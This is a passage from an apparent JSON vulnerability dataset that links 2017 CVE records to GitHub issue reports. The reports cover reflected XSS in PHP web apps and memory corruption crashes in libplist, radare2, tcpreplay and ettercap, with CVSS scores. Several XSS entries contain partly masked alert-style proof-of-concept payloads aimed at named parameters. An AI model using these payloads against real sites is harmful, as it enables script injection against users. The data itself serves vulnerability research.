        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6396",
        "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/820",
        "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/820",
        "Repo_new": "wpo-foundation/webpagetest",
        "Issue_Created_At": "2017-02-27T14:46:24Z",
        "description": "WPO Foundation/webpagetest (lastest version) Cross Site Scripting (XSS). Product\uff1aWPO Foundation/webpagetest Download: URLTAG Vunlerable Version: lastest version Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in \u201cWPO Foundation/webpagetest\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in \u201cpssid\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6415",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/6872",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6872",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-03-01T09:49:29Z",
        "description": "Null pointer dereference in APITAG Null pointer dereference in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6429",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/278",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/278",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2017-02-08T16:16:29Z",
        "description": "tcpcapinfo buffer overflow vulnerablily. From Aromal Raj via APITAG Hi, This mail is to report a Buffer Overflow Vulnerability which i found in 'tcpcapinfo' utility which comes with latest Tcpreplay NUMBERTAG ersion. This happens when tcpcapinfo process a specially crafted pcap file. APITAG to reproduce: raras APITAG tcpcapinfo APITAG \u200b Expected Output: Invalid file should not be parsed. Actual Output: Buffer Overflow APITAG following files attached: APITAG Which is the crafted pcap file gdb.log GDB output valgrind.log Valgrind output Can \u200bthis have a patch upstream? Thanks & Regards, Aromal Raj",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6430",
        "Issue_Url_old": "https://github.com/Ettercap/ettercap/issues/782",
        "Issue_Url_new": "https://github.com/ettercap/ettercap/issues/782",
        "Repo_new": "ettercap/ettercap",
        "Issue_Created_At": "2017-02-07T19:26:29Z",
        "description": "Etterfilter: Invalid read on crafted file APITAG Fault).. Etterfilter results in an invalid read of NUMBERTAG bytes when parsing a crafted file. As seen in valgrind output the issue occurs in the compile_tree function of the ef_compiler.c source file. Steps to reproduce (run on current master ettercap branch): raras APITAG etterfilter crashfile Expected output (possibly): File should not be parsed and error message should be printed stating invalid file. Actual output: Segmentation Fault POC crash file is also attached: FILETAG Valgrind output is as follows: APITAG valgrind etterfilter PATHTAG NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: etterfilter PATHTAG NUMBERTAG etterfilter NUMBERTAG copyright NUMBERTAG Ettercap Development Team NUMBERTAG protocol tables loaded: DECODED DATA udp tcp esp gre icmp ip NUMBERTAG ip arp wifi fddi tr eth NUMBERTAG constants loaded: VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP Parsing source file PATHTAG done. BUG at PATHTAG tree_root == NULL NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG E4D7B9: clean_exit (in PATHTAG NUMBERTAG by NUMBERTAG B0: compile_tree (in PATHTAG NUMBERTAG by NUMBERTAG ERRORTAG NUMBERTAG D3: write_output (in PATHTAG NUMBERTAG by NUMBERTAG BD: main (in PATHTAG NUMBERTAG Address NUMBERTAG bc NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2CC NUMBERTAG calloc (in PATHTAG NUMBERTAG by NUMBERTAG ERRORTAG NUMBERTAG A2: globals_alloc (in PATHTAG NUMBERTAG by NUMBERTAG AF: main (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG E4D7BD: clean_exit (in PATHTAG NUMBERTAG by NUMBERTAG B0: compile_tree (in PATHTAG NUMBERTAG by NUMBERTAG ERRORTAG NUMBERTAG D3: write_output (in PATHTAG NUMBERTAG by NUMBERTAG BD: main (in PATHTAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG E4D7BD: clean_exit (in PATHTAG NUMBERTAG by NUMBERTAG B0: compile_tree (in PATHTAG NUMBERTAG by NUMBERTAG ERRORTAG NUMBERTAG D3: write_output (in PATHTAG NUMBERTAG by NUMBERTAG BD: main (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault Thanks, Raj",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6435",
        "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/93",
        "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/93",
        "Repo_new": "libimobiledevice/libplist",
        "Issue_Created_At": "2017-02-07T06:56:22Z",
        "description": "memory corruption bug. Hi, I found a memory corruption bug. the stack trace is as shown below NUMBERTAG WARNING: APITAG failed to allocate NUMBERTAG fff NUMBERTAG bytes APITAG NUMBERTAG ERROR: APITAG memcpy param overlap: memory ranges FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.0,
        "impactScore": 3.6,
        "exploitabilityScore": 1.3
    },
    {
        "CVE_ID": "CVE-2017-6436",
        "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/94",
        "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/94",
        "Repo_new": "libimobiledevice/libplist",
        "Issue_Created_At": "2017-02-08T03:48:41Z",
        "description": "Memory allocation error. ERROR: APITAG failed to allocate NUMBERTAG a NUMBERTAG bytes of APITAG Cannot allocate memory NUMBERTAG b NUMBERTAG ec4b2 ( PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG dc ( PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG ed ( PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b ( PATHTAG NUMBERTAG b7c in parse_string_node PATHTAG NUMBERTAG b7c in parse_bin_node PATHTAG NUMBERTAG b7c in parse_bin_node_at_index PATHTAG NUMBERTAG a0 in parse_dict_node PATHTAG NUMBERTAG a0 in parse_bin_node PATHTAG NUMBERTAG a0 in parse_bin_node_at_index PATHTAG NUMBERTAG b NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG aef5 in _start ( PATHTAG ) poc: FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.0,
        "impactScore": 3.6,
        "exploitabilityScore": 1.3
    },
    {
        "CVE_ID": "CVE-2017-6437",
        "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/100",
        "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/100",
        "Repo_new": "libimobiledevice/libplist",
        "Issue_Created_At": "2017-02-24T08:36:42Z",
        "description": "heap buffer overflow in base NUMBERTAG encode NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b5e NUMBERTAG at pc NUMBERTAG e bp NUMBERTAG bf NUMBERTAG fda8 sp NUMBERTAG bf NUMBERTAG fd9c READ of size NUMBERTAG at NUMBERTAG b5e NUMBERTAG thread T NUMBERTAG d in base NUMBERTAG encode PATHTAG NUMBERTAG in node_to_xml PATHTAG NUMBERTAG f in plist_to_xml PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG b5f NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG af NUMBERTAG in _start ( PATHTAG NUMBERTAG b5e NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.0,
        "impactScore": 3.6,
        "exploitabilityScore": 1.3
    },
    {
        "CVE_ID": "CVE-2017-6438",
        "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/98",
        "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/98",
        "Repo_new": "libimobiledevice/libplist",
        "Issue_Created_At": "2017-02-24T08:24:43Z",
        "description": "heap buffer overflow in parse_unicode_node NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b5e NUMBERTAG at pc NUMBERTAG bp NUMBERTAG bf8e7e NUMBERTAG sp NUMBERTAG bf8e7e6c WRITE of size NUMBERTAG at NUMBERTAG b5e NUMBERTAG thread T NUMBERTAG in parse_unicode_node PATHTAG NUMBERTAG in parse_bin_node PATHTAG NUMBERTAG in parse_bin_node_at_index PATHTAG NUMBERTAG in parse_dict_node PATHTAG NUMBERTAG in parse_bin_node PATHTAG NUMBERTAG in parse_bin_node_at_index PATHTAG NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG b5f NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG af NUMBERTAG in _start ( PATHTAG NUMBERTAG b5e NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.3,
        "impactScore": 5.9,
        "exploitabilityScore": 1.3
    },
    {
        "CVE_ID": "CVE-2017-6439",
        "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/95",
        "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/95",
        "Repo_new": "libimobiledevice/libplist",
        "Issue_Created_At": "2017-02-08T05:08:19Z",
        "description": "heap buffer overflow in parse_string_node NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b5e NUMBERTAG e at pc NUMBERTAG b bp NUMBERTAG bfabe NUMBERTAG sp NUMBERTAG bfabdffc WRITE of size NUMBERTAG at NUMBERTAG b5e NUMBERTAG e thread T NUMBERTAG a in parse_string_node PATHTAG NUMBERTAG a in parse_bin_node PATHTAG NUMBERTAG a in parse_bin_node_at_index PATHTAG NUMBERTAG a0 in parse_dict_node PATHTAG NUMBERTAG a0 in parse_bin_node PATHTAG NUMBERTAG a0 in parse_bin_node_at_index PATHTAG NUMBERTAG b NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG b5f9ba NUMBERTAG PATHTAG NUMBERTAG aef5 in _start ( PATHTAG NUMBERTAG b5e NUMBERTAG e is located NUMBERTAG bytes to the left of NUMBERTAG byte region FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.0,
        "impactScore": 3.6,
        "exploitabilityScore": 1.3
    },
    {
        "CVE_ID": "CVE-2017-6440",
        "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/99",
        "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/99",
        "Repo_new": "libimobiledevice/libplist",
        "Issue_Created_At": "2017-02-24T08:32:19Z",
        "description": "Memory allocation error NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG eff NUMBERTAG bytes of APITAG Cannot allocate memory NUMBERTAG Process memory map follows NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5b NUMBERTAG b5c NUMBERTAG b5d NUMBERTAG b5e NUMBERTAG b5f NUMBERTAG b5f8a NUMBERTAG b5f9b NUMBERTAG b5f9b NUMBERTAG b5fb NUMBERTAG PATHTAG NUMBERTAG b5fb NUMBERTAG b5fb NUMBERTAG PATHTAG NUMBERTAG b5fb NUMBERTAG b5fbb NUMBERTAG PATHTAG NUMBERTAG b5fbb NUMBERTAG b5fbc NUMBERTAG PATHTAG NUMBERTAG b5fbc NUMBERTAG b5fbd NUMBERTAG PATHTAG NUMBERTAG b5fbd NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG FILETAG NUMBERTAG a3 in parse_bin_node PATHTAG NUMBERTAG a3 in parse_bin_node_at_index PATHTAG NUMBERTAG in parse_dict_node PATHTAG NUMBERTAG in parse_bin_node PATHTAG NUMBERTAG in parse_bin_node_at_index PATHTAG NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG b5fd6a NUMBERTAG PATHTAG NUMBERTAG af NUMBERTAG in _start ( PATHTAG ) FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.0,
        "impactScore": 3.6,
        "exploitabilityScore": 1.3
    },
    {
        "CVE_ID": "CVE-2017-6448",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/6885",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6885",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-03-02T16:47:42Z",
        "description": "Stack buffer overflow in APITAG Stack buffer overflow in APITAG Tested on Git HEAD NUMBERTAG e NUMBERTAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG More context in Valgrind report (I can overwrite return address! please consider using stack canaries, because are disabled by default). ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6478",
        "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/15",
        "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/15",
        "Repo_new": "paintballrefjosh/mangoswebv4",
        "Issue_Created_At": "2017-03-04T05:01:11Z",
        "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \"step\" HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG APITAG < The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ) FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6479",
        "Issue_Url_old": "https://github.com/FenixHosting/fenix-open-source/issues/2",
        "Issue_Url_new": "https://github.com/fenixhosting/fenix-open-source/issues/2",
        "Repo_new": "FenixHosting/fenix-open-source",
        "Issue_Created_At": "2017-03-04T14:42:05Z",
        "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \"search by topic\" HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6480",
        "Issue_Url_old": "https://github.com/groovel/cmsgroovel/issues/2",
        "Issue_Url_new": "https://github.com/groovel/cmsgroovel/issues/2",
        "Repo_new": "groovel/cmsgroovel",
        "Issue_Created_At": "2017-03-04T05:34:46Z",
        "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \u201cpath\u201d HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_REQUEST FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6481",
        "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/992",
        "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/992",
        "Repo_new": "phpipam/phpipam",
        "Issue_Created_At": "2017-02-27T18:04:54Z",
        "description": "phpipam (lastest version) Multiple Cross Site Scripting (XSS). Product\uff1aphpipam Download: URLTAG Vunlerable Version: lastest version and probably prior Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered multiple Cross Site Scripting (XSS) in \u201cphpipam\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to several pages. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG Post : instructions = > APITAG alert NUMBERTAG APITAG APITAG APITAG alert NUMBERTAG APITAG < To FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6483",
        "Issue_Url_old": "https://github.com/atutor/ATutor/issues/129",
        "Issue_Url_new": "https://github.com/atutor/atutor/issues/129",
        "Repo_new": "atutor/atutor",
        "Issue_Created_At": "2017-03-02T17:15:46Z",
        "description": "APITAG \u2013 Multiple Cross Site Scripting (XSS). Product: APITAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in the \u201clang_code\u201d HTTP GET parameter passed to PATHTAG PATHTAG and PATHTAG An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6484",
        "Issue_Url_old": "https://github.com/INTER-Mediator/INTER-Mediator/issues/772",
        "Issue_Url_new": "https://github.com/inter-mediator/inter-mediator/issues/772",
        "Repo_new": "inter-mediator/inter-mediator",
        "Issue_Created_At": "2017-03-03T12:55:16Z",
        "description": "INTER Mediator \u2013 Multiple Cross Site Scripting (XSS) . Product: INTER Mediator Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cINTER Mediator NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in the \u201cc\u201d HTTP POST parameter and in the \u201ccred\u201d HTTP POST parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG POST parameter : cred Value : \" /> APITAG alert NUMBERTAG APITAG < To: FILETAG NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6485",
        "Issue_Url_old": "https://github.com/jasonjoh/php-calendar/issues/4",
        "Issue_Url_new": "https://github.com/jasonjoh/php-calendar/issues/4",
        "Repo_new": "jasonjoh/php-calendar",
        "Issue_Created_At": "2017-03-03T16:54:12Z",
        "description": "php calendar \u2013 Cross Site Scripting (XSS) . Product: php calendar Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201cphp calendar latest version\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the APITAG HTTP GET parameter passed to the \u201cphp calendar APITAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6486",
        "Issue_Url_old": "https://github.com/reasoncms/reasoncms/issues/264",
        "Issue_Url_new": "https://github.com/reasoncms/reasoncms/issues/264",
        "Repo_new": "reasoncms/reasoncms",
        "Issue_Created_At": "2017-03-02T17:00:54Z",
        "description": "reasoncms \u2013 Cross Site Scripting (XSS). Product: reasoncms Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201creasoncms NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the APITAG HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6487",
        "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/165",
        "Issue_Url_new": "https://github.com/telaxus/epesi/issues/165",
        "Repo_new": "Telaxus/EPESI",
        "Issue_Created_At": "2017-03-02T18:16:08Z",
        "description": "EPESI \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: EPESI Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cEPESI NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc: Multiple POST parameters : state, element, id, tab, cid Value : > APITAG alert NUMBERTAG APITAG < To: FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6488",
        "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/166",
        "Issue_Url_new": "https://github.com/telaxus/epesi/issues/166",
        "Repo_new": "Telaxus/EPESI",
        "Issue_Created_At": "2017-03-02T18:17:34Z",
        "description": "EPESI \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: EPESI Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cEPESI NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc: Multiple POST parameters : visible, tab, cid Value : > APITAG alert NUMBERTAG APITAG < To: FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6489",
        "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/169",
        "Issue_Url_new": "https://github.com/telaxus/epesi/issues/169",
        "Repo_new": "Telaxus/EPESI",
        "Issue_Created_At": "2017-03-02T18:21:19Z",
